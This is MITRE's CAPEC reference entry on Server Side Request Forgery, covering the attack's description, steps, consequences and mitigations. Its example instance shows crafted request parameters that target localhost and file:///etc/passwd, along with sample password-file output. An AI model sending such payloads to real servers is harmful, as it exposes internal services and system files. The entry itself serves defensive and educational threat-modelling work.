New to CAPEC? Start Here
Home > CAPEC List > CAPEC-664: Server Side Request Forgery (Version 3.5)  

CAPEC-664: Server Side Request Forgery

Attack Pattern ID: 664
Abstraction: Standard
Status: Stable
Presentation Filter:
+ Description

An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.

+ Likelihood Of Attack

High

+ Typical Severity

High

+ Relationships
Section HelpThis table shows the other attack patterns and high level categories that are related to this attack pattern. These relationships are defined as ChildOf and ParentOf, and give insight to similar items that may exist at higher and lower levels of abstraction. In addition, relationships such as CanFollow, PeerOf, and CanAlsoBe are defined to show similar attack patterns that the user may want to explore.
NatureTypeIDName
ChildOfMeta Attack PatternMeta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.115Authentication Bypass
CanFollowMeta Attack PatternMeta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.122Privilege Abuse
CanFollowStandard Attack PatternStandard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.126Path Traversal
CanFollowMeta Attack PatternMeta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.161Infrastructure Manipulation
CanFollowStandard Attack PatternStandard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.253Remote Code Inclusion
CanFollowStandard Attack PatternStandard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.309Network Topology Mapping
Section HelpThis table shows the views that this attack pattern belongs to and top level categories within that view.
+ Execution Flow
Explore
  1. Find target application: Find target web application that accepts a user input and retrieves data from the server

Experiment
  1. Examine the HTTP/GET request to view the URL query format
    Techniques
    Attempt manipulating the URL to retrieve an error response/code from the server to determine if URL/request validation is done.
    Use a list of XSS probe strings to specify as parameters to known URLs. If possible, use probe strings with unique identifiers.
    Create a GET request with a common server file path such as /etc/passwd as a parameter and examine output.
Exploit
  1. Malicious request: Adversary crafts a malicious URL request that assumes the privilege level of the server to query internal or external network services

+ Prerequisites
Server must be running a web application that processes HTTP requests.
+ Skills Required
[Level: Medium]
The adversary will have to detect the vulnerability through an intermediary service or specify maliciously crafted URLs and analyze the server response.
[Level: High]
The adversary will be required to access internal resources, extract information, or leverage the services running on the server to perform unauthorized actions such as traversing the local network or routing a reflected TCP DDoS through them.
+ Resources Required
[None] No specialized resources are required to execute this type of attack.
+ Consequences
Section HelpThis table specifies different individual consequences associated with the attack pattern. The Scope identifies the security property that is violated, while the Impact describes the negative technical impact that arises if an adversary succeeds in their attack. The Likelihood provides information about how likely the specific consequence is expected to be seen relative to the other consequences in the list. For example, there may be high likelihood that a pattern will be used to achieve a certain impact, but a low likelihood that it will be exploited to achieve a different impact.
ScopeImpactLikelihood
Integrity
Confidentiality
Availability
Modify Data
Confidentiality
Read Data
Availability
Resource Consumption
+ Mitigations
Handling incoming requests securely is the first line of action to mitigate this vulnerability. This can be done through URL validation.
Further down the process flow, examining the response and verifying that it is as expected before sending would be another way to secure the server.
Allowlist the DNS name or IP address of every service the web application is required to access is another effective security measure. This ensures the server cannot make external requests to arbitrary services.
Requiring authentication for local services adds another layer of security between the adversary and internal services running on the server. By enforcing local authentication, an adversary will not gain access to all internal services only with access to the server.
Enforce the usage of relevant URL schemas. By limiting requests be made only through HTTP or HTTPS, for example, attacks made through insecure schemas such as file://, ftp://, etc. can be prevented.
+ Example Instances

An e-commerce website allows a customer to filter results by specific categories. When the customer selects the category of choice, the web shop queries a back-end service to retrieve the requested products. The request may look something like:

POST /product/category HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Length: 200

vulnerableService=http://vulnerableshop.net:8080/product/category/check%3FcategoryName%3DsomeCategory

A malicious user can modify the request URL to look like this instead:

POST /product/category HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Length: 200

vulnerableService=http://localhost/server-status

or

vulnerableService = file:///etc/passwd

or

vulnerableService=dict://localhost:12345/info

If the exploit is successful, the server may return the data requested by the adversary

root:!:0:0::/:/usr/bin/ksh

daemon:!:1:1::/etc:

bin:!:2:2::/bin:

sys:!:3:3::/usr/sys:

adm:!:4:4::/var/adm:

uucp:!:5:5::/usr/lib/uucp:

guest:!:100:100::/home/guest:

nobody:!:4294967294:4294967294::/:

lpd:!:9:4294967294::/:

lp:*:11:11::/var/spool/lp:/bin/false

invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh

nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico

paul:!:201:1::/home/paul:/usr/bin/ksh

jdoe:*:202:1:My name:/home/myname:/usr/bin/ksh

The CallStranger attack is an observed example of SSRF. It specifically targets the UPnP (Universal Plug and Play) protocol used by various network devices and gaming consoles. To execute the attack, an adversary performs a scan of the LAN to discover UPnP enabled devices, and subsequently a list of UPnP services they use. Once the UPnP service endpoints are listed, a vulnerability in the UPnP protocol is used to send these endpoints as encrypted to a verification server via the UPnP Callback method. Because the encryption is done on the client side, the server returns an encrypted list of services which is decrypted on the client side. The adversary then has a list of services running the vulnerable UPnP protocol, which the adversary can leverage to make spoofed requests. [REF-646]

+ References
[REF-644] "OWASP SSRF Bible". OWASP. 2017-01-26. <https://cheatsheetseries.owasp.org/assets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet_SSRF_Bible.pdf>. URL validated: 2021-05-17.
[REF-645] "Server Side Request Forgery". PortSwigger. <https://portswigger.net/web-security/ssrf>. URL validated: 2021-05-17.
[REF-646] "CallStranger Vulnerability". Yunus Cadirici. 2020-06-08. <https://github.com/yunuscadirci/CallStranger>. URL validated: 2021-05-17.
+ Content History
Submissions
Submission DateSubmitterOrganization
2021-06-24CAPEC Content TeamThe MITRE Corporation
More information is available — Please select a different filter.
Page Last Updated or Reviewed: June 24, 2021